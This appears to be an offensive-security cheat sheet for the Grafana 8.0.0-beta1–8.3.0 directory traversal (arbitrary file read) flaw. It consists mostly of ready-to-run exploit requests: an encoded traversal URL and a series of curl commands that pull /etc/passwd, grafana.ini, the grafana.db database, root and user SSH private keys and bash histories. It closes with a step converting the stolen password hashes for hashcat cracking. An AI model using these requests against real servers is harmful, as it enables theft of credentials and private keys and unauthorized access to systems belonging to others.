# Grafana
## Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read
{% code overflow="wrap" %}
```python
http://10.10.99.76:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
```
{% endcode %}
### Grafana Conf File
```
/etc/grafana/grafana.ini
```
### Interesting LFI Files
{% code fullWidth="false" %}
```python
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../etc/passwd -o passwd
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../etc/grafana/grafana.ini -o grafana.ini
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../root/.ssh/id_rsa
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../root/.bash_history
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../home/grafana/.ssh/id_rsa
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../home/grafana/.bash_history
```
{% endcode %}
## Grafana2Hashcat
We can convert the hashes from graphana to hashcat using this tool
Hashes should be in this format
HASH,SALT
{% embed url="" %}
```python
python3 grafana2hashcat.py grafana_hashes.txt -o output-hash.txt
```
